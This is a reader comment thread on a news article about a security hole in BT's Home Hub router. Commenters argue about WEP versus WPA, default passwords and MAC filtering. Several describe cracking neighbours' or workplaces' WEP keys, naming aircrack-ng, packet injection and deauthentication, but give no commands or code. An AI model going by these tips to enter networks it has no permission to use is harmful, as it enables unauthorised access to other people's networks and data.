back to article Yet another hole found in BT Wi-Fi router

Users of Britain's most popular Wi-Fi router have yet another reason to change the default settings toute de suite, and once again they have the folks in BT's security department to thank. In recent weeks, they changed the default password in the BT Home Hub, from "admin" to the device's unique serial number. In theory, this …


This topic is closed for new posts.
  1. Anonymous Coward
    Anonymous Coward

    They tested the security as well as the legal advice for Phorm/Webwise

    These are the very same people who assure us our data is secure with the Phorm/Webwise wiretap!

    BT was once a great organisation. I know, I worked there once (not inferring I made it 'great) . In my opinion they are now beginning to reach rock bottom. Maybe they should be forced to remove the word British from their name.

    They don't seem to be associated with anything 'Great' that is synonymous with the term 'British'.

  2. Anonymous Coward

    What about Hardware Pairing Mode?

    Isn't the default security setting WEP plus Hardware Pairing?

    Can this be circumvented with packet sniffing and MAC spoofing? Just interested this doesn't seem to be mentioned in even the BT advisory.

  3. Anonymous Coward

    So, to recap

    They have to sit outside the mark's house, hack into their unsecureish wifi network and the hack into the homehub from the inside hoping that multicast is switched on?

    Why wouldn't they just hack the unprotected computers on the wifi network ? That's what I'd do, if I did that sort of thing ....

    Pingu, cos *nix is as unsecure as the Bt Homehub out of the box (alledgedly) and the dumb endusers believe it's secure.

  4. Anonymous Coward
    Anonymous Coward

    @ "Why wouldn't they just hack the unprotected computers on the network?"

    "Why wouldn't they just hack the unprotected computers on the network?"

    Because it's easier to hack the home hub. You now know exactly how to hack it, you have no idea how secure or otherwise the home pcs are.

  5. Khyle Westmoreland


    You can't flash these with DD-WRT... Linux running on a tiny box ftw!

  6. alistair millington
    Thumb Up

    Buy a proper router from a proper company.

    Nuff said.

  7. Anonymous Coward
    Anonymous Coward

    A title is required. - why???

    Reminds me of my bosses home hub router...he was having problems with it, and spoke to support, who told him to set his key to '"aaaaaa.... " 'so it'd be easier to remember'...

    No icon, because they're crap.

  8. Edward Pearson
    Thumb Down

    Not THAT impressive.

    This of course is only useful if:

    A) You're on the LAN (and yet still need/want access to the HomeHub for some reason)

    B) The admin hasn't bothered to change the default password.

    A nice PoC, but in practice it's a white elephant.

  9. Henry


    WEP may be insecure, but I've had no-one hack into my network in the few years I've had (have some old non-WPA-able kit). Maybe this is because everyone will just go for the actually insecure network a door or two along from me.

    Has anyone here actually hacked into a WEP-protected network? I know it's trivial to crack in theory, but have never tried it myself.

  10. Mark

    Re: Shame...

    And it's not that great if you don't have root access on your machine: you can't take any extra procedures to secure your appliance running linux. Which is one reason why your linux router should be able to be upgraded with any other feasible linux OS. Unlike TiVo's locking of the hardware to the One Blessed Image. If the manufacturer has root and you don't, they still to some extent own it.

    For those who don't know about how to secure linux, they won't be any worse off with root being possible. But those who do will find their appliance much more worthy.

  11. Matt Thornton
    Thumb Down

    BT's security advice

    "Regularly changing the [WEP] key will reduce the risk of hacking."

    I love it. It's a bit like saying "Regularly changing the colour of your car will reduce the risk of having it stolen."

    And to think I was considering applying for BT's graduate training programme.

  12. Larry Cumber

    wep ?

    Interesting Hacking the BTHomeHub. It now gives an open room for some to get in before the administrative pass word is changed. Well, It would be nice for some to make money by hacking specific sytems and letting the owners know they just left their back door open. <<<<We could help you change it <<<<<

  13. Anonymous Coward
    Anonymous Coward


    Yup, I've cracked one... I got bored, and there was one on the floor below me at the office (different company), and I was curious to see if it really was that easy.

    I wasn't using the latest techniques, so my sniffer had to wait a while for enough interesting packets, I didn't do anything to force them to be generated as has become the norm these days. It was a purely passive crack.

    It took a couple of weeks before I had enough logged, but once that was done, it spat out a WEP key.

    So beware the man who has a laptop tucked under his desk booted into linux. :-)

    Anon cos the thought police will say I was very naughty, even though I wandered down stairs and told them their network was insecure and handed them their own WEP key, and yes, they promptly went and secured it, by entering a new WEP key... D'oh! There's no telling some poeple... One day... When I'm bored again....

  14. Paul
    Black Helicopters

    changing your WEP key frequently

    well, if you must use WEP, it's perhaps the only thing you can do. snag is, even if you changed your key daily or more frequently (perhaps using aircrack to monitor your network and warn you if there had been sufficient "interesting" packets to crack your key), that'd be insufficient to keep an automated attack out since it's possible to flood the network and sniff enough packets to crack a wep key in minutes!

  15. Simon Greenwood
    Thumb Up

    Re: Shame

    I think they are - they have the Fon wi-fi sharing code in them and that is a variant of DD-WRT. I don't know if it's been hacked yet.

  16. Mark

    Using WEP

    It's enough to use WEP IMO because

    a) it means that nobody will access it thinking that it is an open hotspot

    b) WPA isn't 100% supported on older Windows OSs

    c) WPA is still kind of fiddly for noobs

    and if your stuff isn't valuable, who's going to make the attempt to crack it open?

    'course to some people, just the attempt to use "your" wireless is tantamount to breaking into your home and violating the family dog, so there's no need for any protection anyway, is there..?

  17. James

    Probably a silly question

    This is probably a silly question but isn't the device serial no also on a label on the outside? In which case if you have access to the house (eg a friend's house, go there for a party etc etc) a quick peek and you then know their router password?

  18. Anonymous Coward

    Bot Box

    I've said it before.. (24 hr, BB, and who looks at thier routers task list?)

  19. Mickey Porkpies

    Henry and your WEP

    How do you know nobody has hacked your network??

  20. John Bayly
    Thumb Down

    This is the same BT

    Admittedly, BT Ireland, but when asked by my sister about problems using WEP & WPA, told her to disabled encryption and rely on MAC filtering.

    As she works from a Bank, and does work at home, I did point out how easy it is to sniff the data (a little demonstration to tell her what her POP3 login details did the job).

    Security isn't in their repertoire.

  21. Anonymous Coward
    Anonymous Coward

    This is bad - really bad...

    This router is now so insecure my personal data will be stolen long before it gets to Phorm.

    PS. 45 days since I filed a DPA request with BT about the Phorm trials and no response. I think it's time to talk to the Information Commissioner.

  22. Anonymous Coward
    Anonymous Coward


    Yup. One place I used to work had a WEP protected wireless AP. I was using a totally passive mode scanner, but since so many people were using it, my linux laptop kicked out the key in approximately 10 minutes.

    It's easy if you can be bothered. A few months back, so many wireless APs were shipped by default with no encryption that there was no point. Move your laptop 10 feet to the left, and you picked up ANOTHER unencrypted link. Now however, they are almost all shipping with some encryption enabled. For example, I can see about 6 Sky APs and 3 BT ones from my living room, and they are all encrypted in some way.

    This means that WEP is more likely to be attacked due to the fact that it's starting to be "the easiest option".

    A/C in case my pervious place of work DO have a problem with me hacking a network I was allowed to use ;)

  23. Anonymous Coward

    @John Bayly

    There are still *banks* using POP3 with plain text password? They kinda deserve to get snorted if their IT department is that old school.

  24. Alan W. Rateliff, II
    Paris Hilton


    > It's enough to use WEP IMO because

    IMNSHO, your IMO is not very good. In fact, your argument is shit.

    > a) it means that nobody will access it thinking that it is an open hotspot

    That is the defense of the guilty. Even my parents know the difference between "someone's" open network and the open network of a WiFi hot-spot. At the very least, here are plenty of markings and "welcomes" at places with free WiFi.

    > b) WPA isn't 100% supported on older Windows OSs

    Avoiding the obvious DO NOT USE OLD BLOODY WINDOWS argument and the flames that ensure, I will simply point out that the LinkSys wireless manager did support WPA on Windows 98SE very well. Though I believe a lot of vendors are dropping Win9x and ME support, and rightly so.

    > c) WPA is still kind of fiddly for noobs

    Hogwash and shenanigans. WEP is fiddly: you cannot use the same pass phrases between vendors because of the differences in the key generation algorithms, so you have to use the 26 digit hex string. WPA is simple: you punch in the pass phrase, irrespective of vendor, and go.

    > and if your stuff isn't valuable, who's going to make the attempt to crack it open?

    Value is like beauty. Just because she is a fat chick, that does not mean you do not have the chance to get snogged. In some cases, people do not give two shits about you, they may just want your bandwidth or resources. And invariably someone forgets some part of security: sure, they set a WEP key, but they may still have the default admin password set, allowing a quick DNS entry to a nefarious server. Or perhaps using unencrypted POP3 and SMTP over a WEP connection.

    > 'course to some people, just the attempt to use "your" wireless is tantamount to > breaking into your home and violating the family dog, so there's no need for any > protection anyway, is there..?

    Brilliant phuqn logic, mate. Since you want to make this invalid connection, why not just leave all of your doors unlocked from now on. I mean, really, nothing you have inside is of value, so why not just let anyone parade on through? Heck, just offer up your dog while you're at it.

    Personally, I do not care if you want to spread your WiFi love around the neighborhood, but you simply cannot justify it with the "I don't got nothing to hide" or "there ain't nothing valuable here" arguments. Come up with something else, because those arguments just do not float.

    Paris, because she does not want hippies humping her dog either, and now understands just a teensy bit about security.

  25. Aodhhan


    So you don't have anything a hacker wants on your computer, so you dont care.

    Do you have people who don't like you?

    Doesn't take a lot to hack into someones computer, hide child porn, documents about stalking, plans to kill someone etc. Then call the police, and say this person tried to trade child pornography with you. Even take over his mailbox and send some things out in his behalf.

    Bingo, you go to jail for something you didn't do.

    Once you learn packet injection techniques, you can crack a WEP password in less than 5 minutes. A noob using Aircrack can do it in 1 to 3 days; depending on how often you use it and how many IV packets are available.

  26. Scott


    Use a Cable??????

  27. Mark

    Alan W. Rateliff, II

    For someone whose parents couldn't think of a name, I doubt this:

    "Even my parents know the difference between "someone's" open network and the open network of a WiFi hot-spot."

    How? When their Windows XP machine connects to the highest strength connection, there's no popup telling you which AP you're on. does it even indicate there's been any change at all?

    So how do they know? Test every fifteen seconds?

    And as to the rest of it, it WAS MY OPINION. YOURS MAY VARY.

    Obviously with a brain like that, you'll be calling your kid Alan W Rateliff, III...

  28. Mark
    Black Helicopters

    Re: Probably a silly question

    Yeah, but they aren't a friend then, are they?

    And if they get into your house, why didn't they install a keylogger? Riffle through your underwear drawer? Steal your panties?

    Sheesh. People call ME paranoid!

  29. Mark

    @Anonymous Coward

    No, by far the easiest connection to hack is the open one without a password or PIN.

    When you crack a closed WEP, how do you know that they aren't collecting your location and MAC number, getting the police to pop over and take you out for illegal access? When you access, how do you know that their computer isn't logging you to see where you go? Checking YOUR computer to see what's in there?

    Anyone here EVER heard of the word "Honeypot"?

    If you're doing something nefarious, don't do it "just because I can": that's why so many morons are in jail.

  30. Anonymous Coward

    @Using WEP

    I've heard this line of argument before from people who didn't see why they should have to bother with a firewall or antivirus on their PC.

    >"and if your stuff isn't valuable, who's going to make the attempt to crack it open?"

    And I suppose you leave your car unlocked outside your house with the keys dangling out of the ignition because "Who's going to want to steal it"? How suicidally dumb can you get? "Any random thief or joyrider", that's who's going to make the attempt, and the same goes for your PC.

    Hell, your PC is probably sitting there right now pumping out spam by the million because of your stupid and complacently ignorant attitude. Get your bloody head out of the sand.

  31. Alan W. Rateliff, II
    Paris Hilton


    Nah, I am particular to "Nolan," myself.

    Interesting, though, that your brain is geared towards avoiding the argument with a "your mom" attack. Splendid work.

    To address the one real question you had, Windows XP does a good job of indicating wireless differing wireless networks, provided they are configured differently. The general rule of thumb, which even my and other's parents understand, is that common names (like "linksys", "default", "netgear", etc.) are not permissible. The name should be something indicative of its actual use.

    "AT&T Wireless," or "T-Mobile HotSpot," or "Free for Airport Use," or of similar ilk. Sure, someone can deliberately defeat this wit by naming his or her SSID something along those lines, but one should still be suspicious and scrutinize what he or she sees, rather than just take things for face value and plunge ahead with reckless abandon.

    And I respect your opinion, I just think your argument is shit. Which, as well indicated, is my opinion as well, so cool your flames.

    Paris, because she respects the "rule of thumb" as well.

  32. Henry

    @Mickey Porkpies

    Because I restrict access based on MAC address, and tie MAC addresses to IP addresses, and my machines are always connected. Thus you'd have to spoof a MAC address to get in, which I'd notice quite quickly when the machine that really has that MAC address starts misbehaving.

  33. Anonymous Coward
    Anonymous Coward

    Re: get a proper router

    If you want to make full use of your BT Broadband package, you do need to use a BT Hub.

    Services like BT FON and Broadband Talk (BT's VOIP service) rely on it. Also, if you have BT Vision, you won't get a QOS session needed for the video-on-demand service if you use a different router.

    I've been using a BT hub since last Summer and haven't had any major problems. I have to confess I've only got round to switching to WPA until the past day or so.

  34. Vertigo

    WEP is totally dead!

    Even complicated WEP keys are broken in 30 sec. using aircrack-ng tool in PTW mode from BackTrack. It pertains to Open authentication. Shared key authentication key search is more complicated, it requires associated victim's STA mac address to perform deauthentication firstly to capture WEP 4-way authentication handshake, but it also works perfectly! Worstly, I can crack dynamic WEP keys with 802.1X authentication!! Thanks, to PTW guys! WPA-PSK authentication with complicated (at least 20 characters long pre-shared password) shared secret helps.

  35. Anonymous Coward
    Anonymous Coward

    @ Henry

    Yes, I've cracked one. And WPA (and WPA2 as well) - they're all relatively trivial (though the WPA family is an order of magnitude more resource intensive than WEP)

    Thing about WPA/WPA2's security is that the SSID and key are related. You can either throw massive amounts of CPU time at the problem and use the SSID to compromise the key, or you can use massive precomputed tables with common SSIDs and common passwords, and the resulting key - effectively throwing disk space at the problem.

    (Note that turning SSID broadcast off only stops ACTIVE sniffing, which isn't the preferred method of network discovery at all - if there's any data on the network at all, the SSID is being broadcast with every packet)

    Turns out that setting out that setting your SSID to something that looks like a strong(ish) password is actually a useful security measure - it prettymuch guarantees your SSID won't fall into one of those tables (though given enough time, or enough luck, it's still cake) - at least until disk prices drop farther.

    Bottom line: Your data is not safe over the air no matter what encryption you're using.

  36. Henry


    Well, quite. Which is why the bottom line is: don't have a single point of failure, and make sure that even if someone does crack the wireless bit of the network then they'll have to do lots more work to do anything once they're in.

  37. John A Thomson
    IT Angle

    Shame BT haven't told... em... BT

    It is just a shame that BT Installation Engineers and their telephone support staff may still be using the default WEP out the box set-up!!! Well that was the case one month ago when their own website had advisories stating WEP bad, use WPA instead.

    More info:

  38. Hate2Register

    "The typical Reg reader should have no trouble with security.."

    I'll give you a bagel, might go with the brown nose you've got up my butt.

  39. Mark

    Re: AC "Using WEP"

    "Hell, your PC is probably sitting there right now pumping out spam by the million because of your stupid and complacently ignorant attitude. Get your bloody head out of the sand."

    Well, not really. There aren't any bots that run on a Nokia N800 that I know of. My real PC's are wired up and the wireless is only for browsing the internet reading mail and similar stuff on a machine that

    a) is running Linux

    b) is very underpowered

    c) isn't x86

    d) isn't on much at all

    Not an easy target.

    I have a laptop too, but that connects using SSH with shared keys, is running linux too, has a firewall and isn't on 24/7.

    And having a firewall on the PC with windows is practically mandated now. That'll stop botnets getting on unless you keep clicking on those popups (use FF/AdBlock/Flashnot/et al).

    Now that you know you JUMPED to a conclusion, you gonna say sorry? Or just fuck off home?

  40. Mark

    @Alan III

    "To address the one real question you had, Windows XP does a good job of indicating wireless differing wireless networks, provided they are configured differently."

    Shall I point out the important words here:

    "provided they are configured differently."

    That requires that the OTHER persons' WiFi AP is configured for YOUR use.

    See a problem there?

    Your parents knowing the open point is really supposed to be open depends on the owner of the open point to set it the way THEY understand it to mean "this is an open AP".

    A bit hard for people to know what your parents think, isn't it?

This topic is closed for new posts.

Other stories you might like